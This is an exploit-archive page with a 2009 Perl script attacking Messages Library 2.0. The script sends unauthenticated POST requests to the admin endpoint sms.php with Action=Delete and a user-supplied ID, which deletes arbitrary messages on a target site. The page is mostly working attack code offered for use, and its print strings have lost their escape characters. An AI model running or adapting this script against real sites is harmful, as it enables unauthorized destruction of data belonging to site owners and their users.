[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Messages Library 2.0 Arbitrary Delete Message Vulnerability
# Published : 2009-07-01
# Author : Stack
# Previous Title : Rentventory Multiple Remote SQL Injection Vulnerabilities
# Next Title : Messages Library 2.0 Insecure Cookie Handling Vulnerability


#!/usr/bin/perl -w
#  Messages Library 2.0 <=  Arbitrary Delete Message
########################################
#[*] Founded &  Exploited by : Stack
########################################
print "tt############################################################nn";
print "tt#   Messages Library 2.0 <=  Arbitrary Delete Message      #nn";
print "tt#                          by Stack                        #nn";
print "tt############################################################nn";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/n" unless @ARGV;
print "n[!] ContactID : ";
chomp(my $id=<STDIN>);
$b = LWP::UserAgent->new() or die "Could not initialize browsern";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id."";
$res = $b->request(HTTP::Request->new(POST=>$host));
        print "nBrought to you by v4-team.com...n";
        print "n[+] Message Deleted n";

# www.Syue.com [2009-07-01]